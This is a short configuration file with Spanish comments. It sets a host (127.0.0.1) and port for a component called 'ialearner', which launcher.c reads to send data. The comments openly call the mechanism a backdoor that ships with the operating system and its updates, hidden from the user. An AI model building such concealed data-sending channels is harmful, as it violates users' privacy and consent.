# Este archivo sería uno de configuración interna, determina a donde debe conectarse el 
# launcher para enviar datos, la ip y el puerto de ialearner basicamente
# lo lee launcher.c pero no lo ingresa el usuario ya que como es un backdoor el no tiene
# que acceder ni saber de esto, se inluye con el SO, y cada actualizacion

IALEARNER_HOST 127.0.0.1
IALEARNER_PORT 8080